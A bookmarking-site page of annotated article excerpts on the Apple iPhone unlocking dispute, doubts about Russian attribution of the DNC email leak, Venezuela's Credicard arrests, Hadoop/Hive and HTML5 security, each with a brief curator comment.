  • Pending before federal magistrate judge James Orenstein is the government’s request for an order obligating Apple, Inc. to unlock an iPhone and thereby assist prosecutors in decrypting data the government has seized and is authorized to search pursuant to a warrant. In an order questioning the government’s purported legal basis for this request, the All Writs Act of 1789 (AWA), Judge Orenstein asked Apple for a brief informing the court whether the request would be technically feasible and/or burdensome. After Apple filed, the court asked it to file a brief discussing whether the government had legal grounds under the AWA to compel Apple’s assistance. Apple filed that brief and the government filed a reply brief last week in the lead-up to a hearing this morning.
  • We’ve long been concerned about whether end users own software under the law. Software owners have rights of adaptation and first sale enshrined in copyright law. But software publishers have claimed that end users are merely licensees, and our rights under copyright law can be waived by mass-market end user license agreements, or EULAs. Over the years, Granick has argued that users should retain their rights even if mass-market licenses purport to take them away. The government’s brief takes advantage of Apple’s EULA for iOS to argue that Apple, the software publisher, is responsible for iPhones around the world. Apple’s EULA states that when you buy an iPhone, you’re not buying the iOS software it runs, you’re just licensing it from Apple. The government argues that having designed a passcode feature into a copy of software which it owns and licenses rather than sells, Apple can be compelled under the All Writs Act to bypass the passcode on a defendant’s iPhone pursuant to a search warrant and thereby access the software owned by Apple. Apple’s supplemental brief argues that in defining its users’ contractual rights vis-à-vis Apple with regard to Apple’s intellectual property, Apple in no way waived its own due process rights vis-à-vis the government with regard to users’ devices. Apple’s brief compares this argument to forcing a car manufacturer to “provide law enforcement with access to the vehicle or to alter its functionality at the government’s request” merely because the car contains licensed software. 
  • This is an interesting twist on the decades-long EULA versus users’ rights fight. As far as we know, this is the first time that the government has piggybacked on EULAs to try to compel software companies to provide assistance to law enforcement. Under the government’s interpretation of the All Writs Act, anyone who makes software could be dragooned into assisting the government in investigating users of the software. If the court adopts this view, it would give investigators immense power. The quotidian aspects of our lives increasingly involve software (from our cars to our TVs to our health to our home appliances), and most of that software is arguably licensed, not bought. Conscripting software makers to collect information on us would afford the government access to the most intimate information about us, on the strength of some words in some license agreements that people never read. (And no wonder: The iPhone’s EULA came to over 300 pages when the government filed it as an exhibit to its brief.)
  • ...1 more annotation...
  • The government’s brief does not acknowledge the sweeping implications of its arguments. It tries to portray its requested unlocking order as narrow and modest, because it “would not require Apple to make any changes to its software or hardware, … [or] to introduce any new ability to access data on its phones. It would simply require Apple to use its existing capability to bypass the passcode on a passcode-locked iOS 7 phone[.]” But that undersells the implications of the legal argument the government is making: that anything a company already can do, it could be compelled to do under the All Writs Act in order to assist law enforcement. Were that the law, the blow to users’ trust in their encrypted devices, services, and products would be little different than if Apple and other companies were legally required to design backdoors into their encryption mechanisms (an idea the government just can’t seem to drop, its assurances in this brief notwithstanding). Entities around the world won’t buy security software if its makers cannot be trusted not to hand over their users’ secrets to the US government. That’s what makes the encryption in iOS 8 and later versions, which Apple has told the court it “would not have the technical ability” to bypass, so powerful — and so despised by the government: Because no matter how broadly the All Writs Act extends, no court can compel Apple to do the impossible.
Gary Edwards

The top 20 HTML5 sites of 2012 | Feature | .net magazine - 0 views

  •  
    Excellent review of great HTML5 Web Sites.  Includes quick reviews of tools and developer services for HTML5, CSS3, Canvas/SVG, and JavaScript.  (No JSON :()  Includes sites offering tutorials and demonstrations of how advanced, even spectacular, HTML5 builds.  This is clearly the kind of resource anyone involved with advancing HTML5 would like to return to and reference as the Web pushes forward.  Good Stuff Oli!!!! "2012 in review: HTML5 Doctor Oli Studholme nominates the websites that made best use of HTML5 this year, including a range of useful developer tools and online resources Another year has flown by, bringing the requisite slew of major changes. HTML5 is on track to be a recommendation in 2014, with W3C appointing four new editors to manage the W3C's HTML5 spec and putting the HTML5 spec on GitHub; and WHATWG focusing on the HTML Living Standard. Responsive design and Twitter Bootstrap went mainstream, IE10 was released (along with seven versions of Chrome and Firefox), and browser support continues to improve. It's impossible to pick only 20 ground-breaking sites from the thousands that did truly advance our collective game, but here's my attempt. For convenience, I've grouped them according to the way in which they use HTML5."
Paul Merrell

Commentary: Don't be so sure Russia hacked the Clinton emails | Reuters - 0 views

  • By James Bamford Last summer, cyber investigators plowing through the thousands of leaked emails from the Democratic National Committee uncovered a clue.A user named “Феликс Эдмундович” modified one of the documents using settings in the Russian language. Translated, his name was Felix Edmundovich, a pseudonym referring to Felix Edmundovich Dzerzhinsky, the chief of the Soviet Union’s first secret-police organization, the Cheka.It was one more link in the chain of evidence pointing to Russian President Vladimir Putin as the man ultimately behind the operation.During the Cold War, when Soviet intelligence was headquartered in Dzerzhinsky Square in Moscow, Putin was a KGB officer assigned to the First Chief Directorate. Its responsibilities included “active measures,” a form of political warfare that included media manipulation, propaganda and disinformation. Soviet active measures, retired KGB Major General Oleg Kalugin told Army historian Thomas Boghart, aimed to discredit the United States and “conquer world public opinion.”As the Cold War has turned into the code war, Putin recently unveiled his new, greatly enlarged spy organization: the Ministry of State Security, taking the name from Joseph Stalin’s secret service. Putin also resurrected, according to James Clapper, the U.S. director of national intelligence, some of the KGB’s old active- measures tactics. On October 7, Clapper issued a statement: “The U.S. Intelligence community is confident that the Russian government directed the recent compromises of emails from U.S. persons and institutions, including from U.S. political organizations.” Notably, however, the FBI declined to join the chorus, according to reports by the New York Times and CNBC.A week later, Vice President Joe Biden said on NBC’s Meet the Press that "we're sending a message" to Putin and "it will be at the time of our choosing, and under the circumstances that will have the greatest impact." When asked if the American public would know a message was sent, Biden replied, "Hope not." Meanwhile, the CIA was asked, according to an NBC report on October 14, “to deliver options to the White House for a wide-ranging ‘clandestine’ cyber operation designed to harass and ‘embarrass’ the Kremlin leadership.”But as both sides begin arming their cyberweapons, it is critical for the public to be confident that the evidence is really there, and to understand the potential consequences of a tit-for-tat cyberwar escalating into a real war. 
  • This is a prospect that has long worried Richard Clarke, the former White House cyber czar under President George W. Bush. “It’s highly likely that any war that began as a cyberwar,” Clarke told me last year, “would ultimately end up being a conventional war, where the United States was engaged with bombers and missiles.”The problem with attempting to draw a straight line from the Kremlin to the Clinton campaign is the number of variables that get in the way. For one, there is little doubt about Russian cyber fingerprints in various U.S. campaign activities. Moscow, like Washington, has long spied on such matters. The United States, for example, inserted malware in the recent Mexican election campaign. The question isn’t whether Russia spied on the U.S. presidential election, it’s whether it released the election emails.Then there’s the role of Guccifer 2.0, the person or persons supplying WikiLeaks and other organizations with many of the pilfered emails. Is this a Russian agent? A free agent? A cybercriminal? A combination, or some other entity? No one knows.There is also the problem of groupthink that led to the war in Iraq. For example, just as the National Security Agency, the Central Intelligence Agency and the rest of the intelligence establishment are convinced Putin is behind the attacks, they also believed it was a slam-dunk that Saddam Hussein had a trove of weapons of mass destruction. Consider as well the speed of the political-hacking investigation, followed by a lack of skepticism, culminating in a rush to judgment. After the Democratic committee discovered the potential hack last spring, it called in the cybersecurity firm CrowdStrike in May to analyze the problem.
  • CrowdStrike took just a month or so before it conclusively determined that Russia’s FSB, the successor to the KGB, and the Russian military intelligence organization, GRU, were behind it. Most of the other major cybersecurity firms quickly fell in line and agreed. By October, the intelligence community made it unanimous. That speed and certainty contrasts sharply with a previous suspected Russian hack in 2010, when the target was the Nasdaq stock market. According to an extensive investigation by Bloomberg Businessweek in 2014, the NSA and FBI made numerous mistakes over many months that stretched to nearly a year. “After months of work,” the article said, “there were still basic disagreements in different parts of government over who was behind the incident and why.”  There was no consensus­, with just a 70 percent certainty that the hack was a cybercrime. Months later, this determination was revised again: It was just a Russian attempt to spy on the exchange in order to design its own. The federal agents also considered the possibility that the Nasdaq snooping was not connected to the Kremlin. Instead, “someone in the FSB could have been running a for-profit operation on the side, or perhaps sold the malware to a criminal hacking group.” Again, that’s why it’s necessary to better understand the role of Guccifer 2.0 in releasing the Democratic National Committee and Clinton campaign emails before launching any cyberweapons.
  • ...2 more annotations...
  • t is strange that clues in the Nasdaq hack were very difficult to find ― as one would expect from a professional, state-sponsored cyber operation. Conversely, the sloppy, Inspector Clouseau-like nature of the Guccifer 2.0 operation, with someone hiding behind a silly Bolshevik cover name, and Russian language clues in the metadata, smacked more of either an amateur operation or a deliberate deception.Then there’s the Shadow Brokers, that mysterious person or group that surfaced in August with its farcical “auction” to profit from a stolen batch of extremely secret NSA hacking tools, in essence, cyberweapons. Where do they fit into the picture? They have a small armory of NSA cyberweapons, and they appeared just three weeks after the first DNC emails were leaked. On Monday, the Shadow Brokers released more information, including what they claimed is a list of hundreds of organizations that the NSA has targeted over more than a decade, complete with technical details. This offers further evidence that their information comes from a leaker inside the NSA rather than the Kremlin. The Shadow Brokers also discussed Obama’s threat of cyber retaliation against Russia. Yet they seemed most concerned that the CIA, rather than the NSA or Cyber Command, was given the assignment. This may be a possible indication of a connection to NSA’s elite group, Tailored Access Operations, considered by many the A-Team of hackers.“Why is DirtyGrandpa threating CIA cyberwar with Russia?” they wrote. “Why not threating with NSA or Cyber Command? CIA is cyber B-Team, yes? Where is cyber A-Team?” Because of legal and other factors, the NSA conducts cyber espionage, Cyber Command conducts cyberattacks in wartime, and the CIA conducts covert cyberattacks. 
  • The Shadow Brokers connection is important because Julian Assange, the founder of WikiLeaks, claimed to have received identical copies of the Shadow Brokers cyberweapons even before they announced their “auction.” Did he get them from the Shadow Brokers, from Guccifer, from Russia or from an inside leaker at the NSA?Despite the rushed, incomplete investigation and unanswered questions, the Obama administration has announced its decision to retaliate against Russia.  But a public warning about a secret attack makes little sense. If a major cyber crisis happens in Russia sometime in the future, such as a deadly power outage in frigid winter, the United States could be blamed even if it had nothing to do with it. That could then trigger a major retaliatory cyberattack against the U.S. cyber infrastructure, which would call for another reprisal attack ― potentially leading to Clarke’s fear of a cyberwar triggering a conventional war. President Barack Obama has also not taken a nuclear strike off the table as an appropriate response to a devastating cyberattack.
  •  
    Article by James Bamford, the first NSA whistleblower and author of three books on the NSA.
Paul Merrell

Venezuelan Intelligence Services Arrest Credicard Directors - nsnbc international | nsn... - 0 views

  • Venezuelan President Nicolas Maduro confirmed Saturday that the state intelligence service SEBIN arrested several directors from the Credicard financial transaction company on Friday night. 
  • The financial consortium is accused of having deliberately taken advantage of a series of cyber attacks on state internet provider CANTV Friday to paralyse its online payment platform–responsible for the majority of the country’s accredited financial transactions, according to its website. “We have proof that it was a deliberate act what Credicard did yesterday. Right now the main people responsible for Credicard are under arrest,” confirmed the president. The government says that millions of attempted purchases using in-store credit and debit card payment machines provided by the company were interrupted after its platform went down for the most part of the day. Authorities also maintain that the company waited longer than the established protocol of one hour before responding to the issues.
  • According to CANTV President Manuel Fernandez, Venezuela’s internet platform suffered at least three attacks from an external source on Friday, one of which was aimed at state oil company PDVSA. CANTV was notified of the attacks by international provider LANautilus, which belongs to Telecom Italia. Nonetheless, Fernandez denied that Credicard’s platform was affected by the interferences to CANTV’s service, underscoring that other financial transaction companies that rely on the state enterprise continued to be operative.
  • ...1 more annotation...
  • On Friday SEBIN Director Gustavo Gonzalez Lopez also openly accused members of the rightwing coalition, the Democratic Unity Roundtable (MUD), of being implicated in the incident. “Members of the MUD involved in the attack on electronic banking service,” he tweeted. “The financial war continues inside and outside the country, internally they are damaging banking operability,” he added. Venezuelan news source La Iguana has reported that the server administrator of Credicard is the company Dayco Host, which belongs to the D’Agostino family. Diana D’Angostino is married to veteran opposition politician, Henry Ramos Allup, president of the National Assembly. On Saturday, the government-promoted Productive Economy Council held an extraordinary meeting of political and business representatives to reject the attack on the country’s financial system.
Gary Edwards

Matt On Stuff: Hadoop For The Rest Of Us - 0 views

  •  
    Excellent Hadoop/Hive explanation.  Hat tip to Matt Asay for the link.  I eft a comment on Matt's blog questioning the consequences of the Oracle vs. Google Android lawsuit, and the possible enforcement of the Java API copyright claim against Hadoop/Hive.  Based on this explanation of Hadoop/Hive, i'm wondering if Oracle is making a move to claim the entire era of Big Data Cloud Computing?  To understand why, it's first necessary to read Matt the Hadoople's explanation.   kill shot excerpt: "You've built your Hadoop job, and have successfully processed the data. You've generated some structured output, and that resides on HDFS. Naturally you want to run some reports, so you load your data into a MySQL or an Oracle database. Problem is, the data is large. In fact it's so large that when you try to run a query against the table you've just created, your database begins to cry. If you listen to its sobs, you'll probably hear "I was built to process Megabytes, maybe Gigabytes of data. Not Terabytes. Not Perabytes. That's not my job. I was built in the 80's and 90's, back when floppy drives were used. Just leave me alone". "This is where Hive comes to the rescue. Hive lets you run an SQL statement against structured data stored on HDFS. When you issue an SQL query, it parses it, and translates it into a Java Map/Reduce job, which is then executed on your data. Although Hive does some optimizations, in general it just goes record by record against all your data. This means that it's relatively slow - a typical Hive query takes 5 or 10 minutes to complete, depending on how much data you have. However, that's what makes it effective. Unlike a relational database, you don't waste time on query optimization, adding indexes, etc. Instead, what keeps the processing time down is the fact that the query is run on all machines in your Hadoop cluster, and the scalability is taken care of for you." "Hive is extremely useful in data-warehousing kind of scenarios. You would
Gary Edwards

Discoverer of JSON Recommends Suspension of HTML5 | Web Security Journal - 0 views

  •  
    Fascinating conversation between Douglas Crockford and Jeremy Geelan. The issue is that XSS - the Cross Site Scripting capabilities of HTML. and "the painful gap" in the HTML5 specification of the itnerface between JavaScript and the browser. I had to use the Evernote Clearly Chrome extension to read this page. Microsoft is running a huge JavaScript advertisement/pointer that totally blocks the page with no way of closing or escaping. Incredible. Clearly was able to knock it out though. Nicely done! The HTML5-XSS problem is very important, especially if your someone like me that sees the HTML+ format (HTML5-CSS3-JSON-JavaScript-SVG/Canvas) as the undisputed Cloud Productivity Platform "compound document" model. The XSS discussion goes right to the heart of matter of creating an HTML compound document in much the same way that a MSOffice Productivity Compound Document worked. The XSS mimics the functionality of of embedded compound document components such as OLE, DDE, ODBC and Scripting. Crack open any client/server business document and it will be found to be loaded with these embeded components. It seems to me that any one of the Cloud Productivity Platform contenders could solve the HTML-XSS problem. I'm thinking Google Apps, Zoho, SalesForce.com, RackSpace and Amazon - with gApps and Zoho clearly leading the charge. Also let me add that RSS and XMP (Jabber), while not normally mentioned with JSON, ought to be considered. Twitter uses RSS to transport and connect data. Jabber is of course a long time favorite of mine. excerpt: The fundamental mistake in HTML5 was one of prioritization. It should have tackled the browser's most important problem first. Once the platform was secured, then shiny new features could be carefully added. There is much that is attractive about HTML5. But ultimately the thing that made the browser into a credible application delivery system was JavaScript, the ultimate workaround tool. There is a painful gap
1 - 20 of 104 Next › Last »
Showing 20 items per page